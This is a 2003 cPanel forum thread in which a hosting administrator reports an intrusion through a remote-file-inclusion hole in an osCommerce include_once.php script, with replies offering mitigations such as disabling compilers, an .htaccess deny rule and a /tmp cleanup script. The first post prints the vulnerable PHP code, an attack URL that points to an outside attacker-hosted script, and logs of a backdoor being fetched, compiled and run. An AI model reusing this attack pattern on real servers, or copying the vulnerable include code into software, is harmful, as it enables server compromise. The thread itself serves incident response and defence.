The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

OsCommerce v2.1 a major security issue?

Discussion in 'Security' started by ozzi4648, Mar 10, 2003.

  1. ozzi4648

    ozzi4648 Guest

    Does anyone know what verion of OsCommerce is currently being installed on Cpanel? This is really scary:

    I have figured out the point of intrusion, here's how it took place;

    It was done via a web exploitable php script named (include_once.php) which was inside one of my customers' shopping cart folder.
    -----cat include_once.php------
    <?
    if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
    ------------

    The intruder would call this file's url and pass his own url within it as given below;

    -----contents from apache access_log-----
    200.xx.xx.xx [10/Mar/2003:10:34:07 -0600] "GET

    include_once.php?include_file=http://www.myxpls.hpg.com.br/a.php HTTP/1.1"
    ----------

    There were a series of above such urls which were passed and a file bdoor.c would be copied onto my /tmp folder;
    -----contents from error_log----------
    --09:57:25-- http://200.x.x.x:8080/bdoor.c
    => `bdoor.c'
    Connecting to 200.x.x.x:8080... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1,403 [text/plain]
    ----------

    Then the /usr/bin/gcc would be used to compile bdoor.c into filename bdoor
    and would be excuted "./bdoor".

    In my case, as Shashi said i had set chmod 000 for all c compiler in /usr/bin,
    hence the intruder got
    sh: /usr/bin/gcc: Permission denied
    sh: ./bdoor: No such file or directory

    Shashi saved me else the intruder would have cracked the box once again.

    Now i have deleted the include_once.php file.

    Shashi, ajteu and all of you, please let me know now what else can i do?
     
  2. Juanra

    Juanra Well-Known Member

    Joined:
    Sep 22, 2001
    Messages:
    777
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Spain
  3. ozzi4648

    ozzi4648 Guest

    Nope, im waiting for somebody who knows what version of Oscommerce is currently being deployed. While my users can deploy it i have no idea what version it is. Does anyone know? Now we have two, phpbb 2.0.2 and Oscommerce. Again when are they going to give us updates, after we get hacked some more?

    From what i have read, if you chmod the compiler files to 000 in /usrs/bin/*cc* then they cannot compile the backdoor program deployed to /tmp so its useless. Another nifty script is one that runs checking /tmp for any files uploaded there. So if a .c file is found it gets deleted.

    This is from WHT:

    Create a script;

    #!/bin/sh
    while true
    do
    sleep 30s
    cd /tmp
    rm -f *.c
    done
    -----------

    and run that script in the background as
    ./script > /dev/null 2>&1 ENTER

    what that script does is, it will check your /tmp partition every 30 seconds and delete any *.c files that it finds, while sending all output and error messages to /dev/null. Do this if you dont want to chmod your compiler files. Temporary solution.
     
    #3 ozzi4648, Mar 10, 2003
    Last edited by a moderator: Mar 10, 2003
  4. Juanra

    Juanra Well-Known Member

    Joined:
    Sep 22, 2001
    Messages:
    777
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Spain
    Thanks for that. I guess gcc can be non executable most of the time. As for OsCommerce, it seems to be Preview Release 2.2 but I don't know if it's been patched by the Cpanel developers. You may unpack the pkg.tar.gz file yourself and peek inside to check if it's all right.
     
  5. jmc67

    jmc67 Well-Known Member

    Joined:
    Mar 10, 2002
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16
    I downloaded the cpanel package for oscommerce. Looks like its version 2.2

    osCommerce Release 2.2-CVS ($date$)


    The package is located at /usr/local/cpanel/addons/osCommerce
    I checked to see if that file exist and it does not. I even installed it and still no include_once.php file.
     
  6. ozzi4648

    ozzi4648 Guest

    Well my pkg.tar.gz file is dated

    -rw-r--r-- 1 root root 963502 Dec 1 18:31 pkg.tar.gz

    Seems rather old, 3 months old. Whats the date on the pkg file?
     
  7. jmc67

    jmc67 Well-Known Member

    Joined:
    Mar 10, 2002
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16
    -rw-r--r-- 1 root root 963502 Dec 1 21:31 pkg.tar.gz
     
  8. ZachICU

    ZachICU Well-Known Member

    Joined:
    Aug 11, 2001
    Messages:
    130
    Likes Received:
    0
    Trophy Points:
    16
    No word from cpanel team yet on this major security flaw?
     
  9. jumpdomain

    jumpdomain Well-Known Member

    Joined:
    Aug 12, 2001
    Messages:
    109
    Likes Received:
    0
    Trophy Points:
    16
    To stop this particular exploit, you can create a .htaccess file in your /home directory and put in:


    <Files include_once.php>
    order allow,deny
    deny from all
    </Files>


    There is no reason this included file should even be able to be called from the web in the first place.

    But in the end, this package should be updated...
     
  10. iago

    iago Member

    Joined:
    Aug 26, 2002
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    Hi there, i post also this thread
    http://forums.cpanel.net/showthread.php?s=&threadid=7771
    regarding the c compiler option

    But it seems there are too many posts for the support staff to take care off :mad: . Hope they hire more people to give a better support to their clients. I always receive a quicker and more helpful reply at WHT.

    I think this kind of threads can bring up some good ideas of how to secure the server and protect us from buggy scripts that are not updated by Cpanel in the first place.

    Still waiting to know how can i upgrade myself the third party software packages, like phpbb and oscommerce. Any suggestions?

    Regards and hope to hear some input from the support staff or admins. :(
     
  11. Radio_Head

    Radio_Head Well-Known Member

    Joined:
    Feb 15, 2002
    Messages:
    2,051
    Likes Received:
    1
    Trophy Points:
    38
    Are there news about the oscommerce exploit explained in this post ?
     
  12. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,383
    Likes Received:
    23
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
    Sorry if this doesn't pertain to the security problem, but what version of CPanel has OSCommerce installed with it? The CPanel servers we have only have Interchange and Agorra shopping carts installed by default. Is there a way to get OSCommerce integrated into a user's CPanel?
     
  13. myusername

    myusername Well-Known Member
    PartnerNOC

    Joined:
    Mar 6, 2003
    Messages:
    691
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    chown -R us.*yourbase*
    cPanel Access Level:
    DataCenter Provider
    Twitter:
    install os commerce under "addon scripts" from WHM
     
  14. jsteel

    jsteel Well-Known Member

    Joined:
    Jul 4, 2002
    Messages:
    646
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Atlanta, GA
  15. myusername

    myusername Well-Known Member
    PartnerNOC

    Joined:
    Mar 6, 2003
    Messages:
    691
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    chown -R us.*yourbase*
    cPanel Access Level:
    DataCenter Provider
    Twitter:
    Hi I have it downloaded as well but I can t for the life of me see the version number.

    Where did you get "osCommerce Release 2.2-CVS ($date$)"

    from?

    Mine is dated 12-01 like the rest of you folks. Anyone know where to find the current version number of a particular installed cart or for that matter the exact file that states the current addon version being installed from cpanel?

    Anyone?
     
  16. sexy_guy

    sexy_guy Well-Known Member

    Joined:
    Mar 19, 2003
    Messages:
    848
    Likes Received:
    0
    Trophy Points:
    16
Loading...
Similar Threads - OsCommerce major security
  1. tecwithquestion
    Replies:
    2
    Views:
    391

Share This Page